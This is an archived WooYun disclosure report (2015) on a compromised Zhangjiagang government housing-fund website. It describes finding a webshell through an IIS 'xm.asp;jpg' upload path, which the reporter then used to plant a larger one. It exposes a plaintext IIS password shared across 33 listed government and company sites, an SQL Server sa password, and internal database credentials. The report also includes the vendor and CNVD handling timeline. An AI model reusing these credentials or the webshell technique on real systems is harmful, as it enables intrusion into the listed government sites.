乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-20: 细节已通知厂商并且等待厂商处理中 2015-05-25: 厂商已经确认,细节仅向厂商公开 2015-06-04: 细节向核心白帽子及相关领域专家公开 2015-06-14: 细节向普通白帽子公开 2015-06-24: 细节向实习白帽子公开 2015-07-09: 细节向公众公开
webshell是捡到的,呜呜。。涉及好多。。。
www.zjggjj.gov.cn/EpointBigFileUpload/xm.asp;jpg谷歌找到了这个,直接写了一个大马
ID IIS_USER IIS_PASS Domain Path1 IUSR_YJWEB g3_21rzj=0m3hM :80:61.155.218.133:8080: c:\inetpub\wwwroot2 IUSR_YJWEB g3_21rzj=0m3hM :80:www.zjginvest.gov.cn:3215: D:\虚拟目录\机要局网站群\张家港招商网3 IUSR_YJWEB g3_21rzj=0m3hM :80:www.zjgfh.gov.cn:111: D:\虚拟目录\机要局网站群\张家港凤凰4 IUSR_YJWEB g3_21rzj=0m3hM :80:njdjh.com:63::80:www.njdjh.com D:\虚拟目录\南京海外医疗网站5 IUSR_YJWEB g3_21rzj=0m3hM :80:szwzyj.epoint.com.cn D:\虚拟目录\药监\苏州吴中药监系统6 IUSR_YJWEB g3_21rzj=0m3hM :80:bbs.epoint.com.cn:80:bbs.szepec.com D:\虚拟目录\公司论坛7 IUSR_YJWEB g3_21rzj=0m3hM :80:www.jcid.com.cn D:\虚拟目录\机要局网站群\金城投资8 IUSR_YJWEB g3_21rzj=0m3hM :80:www.gtfdc.com.cn:31: D:\虚拟目录\机要局网站群\江苏国泰国际集团房地产实业有限公司9 IUSR_YJWEB g3_21rzj=0m3hM :80:ksgsp.epoint.com.cn D:\虚拟目录\药监\昆山药店系统10 IUSR_YJWEB g3_21rzj=0m3hM :80:csyj.epoint.com.cn:32: D:\虚拟目录\药监\常熟药监系统11 IUSR_YJWEB g3_21rzj=0m3hM :80:siyangtour.com:80:www.siyangtour.com:15: D:\虚拟目录\机要局网站群\泗阳电子商务平台\泗阳旅游局\泗阳旅游局12 IUSR_YJWEB g3_21rzj=0m3hM :80:www.ntkfqztb.cn:80:ntkfqztb.cn:98: D:\虚拟目录\南通\南通经济开发区招投标系统13 IUSR_YJWEB g3_21rzj=0m3hM :80:zgysbwg.com:80:xn--fiQz9J1qDmuXfyA876Bvs8D.net:80:www.zgysbwg.com:80:www.xn--fiQz9J1qDmuXfyA876Bvs8D.net D:\虚拟目录\机要局网站群\泗阳电子商务平台\杨树博物馆14 IUSR_YJWEB g3_21rzj=0m3hM :80:zjgyj.epoint.com.cn:157: D:\虚拟目录\药监\张家港药监系统15 IUSR_YJWEB g3_21rzj=0m3hM :80:youth.jingan.gov.cn:802: D:\虚拟目录\机要局网站群\上海静安区团委16 IUSR_YJWEB g3_21rzj=0m3hM :80:www.epoint.com.cn:5222: D:\虚拟目录\公司网站17 IUSR_YJWEB g3_21rzj=0m3hM :80:swgk.sinano.ac.cn D:\虚拟目录\机要局网站群\苏州纳米所务公开18 IUSR_YJWEB g3_21rzj=0m3hM :80:www.jsntzj.com D:\虚拟目录\机要局网站群\南通市建设工程造价管理处19 IUSR_YJWEB g3_21rzj=0m3hM :80:www.wzqzgh.org:223: D:\虚拟目录\机要局网站群\吴中总工会20 IUSR_YJWEB g3_21rzj=0m3hM :80:www.fhzbmfw.gov.cn:103: D:\虚拟目录\张家港市凤凰镇便民服务中心21 IUSR_YJWEB g3_21rzj=0m3hM :80:szyj.epoint.com.cn D:\虚拟目录\药监\苏州药店系统22 IUSR_YJWEB g3_21rzj=0m3hM :80:xn--wlqrbw0mbuewx4b56wnha80by3ul2xj5d.xn--fiqs8s:80:www.jsncpjjr.cn:80:jsncpjjr.cn D:\虚拟目录\机要局网站群\江苏省农产品经纪人协会23 IUSR_YJWEB g3_21rzj=0m3hM :80:www.ymip.com:145::80:www.jf.zjg.gov.cn D:\虚拟目录\机要局网站群\江苏扬子江国际冶金工业园管理委员会24 IUSR_YJWEB g3_21rzj=0m3hM :80:grs.epoint.com.cn D:\虚拟目录\药监\药监运维系统25 IUSR_YJWEB g3_21rzj=0m3hM :80:tcyj.epoint.com.cn D:\虚拟目录\药监\太仓药监系统26 IUSR_YJWEB g3_21rzj=0m3hM :80:synyjq.com:80:xn--6kR66F.net:80:www.synyjq.com:80:www.xn--6kR66F.net D:\虚拟目录\机要局网站群\泗阳电子商务平台\南园景区27 IUSR_YJWEB g3_21rzj=0m3hM :80:www.zjgsf.gov.cn:80:zjgsf.gov.cn:80:jgzsfs.zjgsf.gov.cn:80:yszsfs.zjgsf.gov.cn:80:nfzsfs.zjgsf.gov.cn:80:tqzsfs.zjgsf.gov.cn:80:lyzsfs.zjgsf.gov.cn:80:dxzsfs.zjgsf.gov.cn:80:fhzsfs.zjgsf.gov.cn:80:yqsfb.zjgsf.gov.cn:80:jfzsfs.zjgsf.gov.cn:203: D:\虚拟目录\机要局网站群\张家港司法局28 IUSR_YJWEB g3_21rzj=0m3hM :80:szxcyj.epoint.com.cn D:\虚拟目录\药监\苏州相城药监系统29 IUSR_YJWEB g3_21rzj=0m3hM :80: D:\虚拟目录\机要局网站群\张家港公积金\张家港公积金网站\EpointBigFileUpload30 IUSR_YJWEB g3_21rzj=0m3hM :80:www.zjggjj.gov.cn:80:www2.zjggjj.gov.cn:809: D:\虚拟目录\机要局网站群\张家港公积金\张家港公积金网站31 IUSR_YJWEB g3_21rzj=0m3hM :80:www.ccade.org:171: D:\虚拟目录\机要局网站群\国家人防定额32 IUSR_YJWEB g3_21rzj=0m3hM :80:old.njqxda.gov.cn:181: D:\虚拟目录\机要局网站群\南京栖霞档案局33 IUSR_YJWEB g3_21rzj=0m3hM :80:wjyj.epoint.com.cn D:\虚拟目录\药监\吴江药监系统
各种网站泄露。。不多说了。
权限非常松,C盘和D盘都可访问。。
Server Domain : www.zjggjj.gov.cnServer Ip : 192.168.0.3:80Terminal Port : 5566
ID=sa;Password=gtig_newtech**##;" providerName="System.Data.SqlClient" />
update DataSource set LoginUser='gtig',LoginPwd='11111',ServerName='192.168.0.5',ConnectionString='server=192.168.0.5;uid=gtig;pwd=11111;database=Epoint_NTI' where DsID=23
删除网站上面的马
危害等级:高
漏洞Rank:14
确认时间:2015-05-25 10:59
CNVD确认所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置.
暂无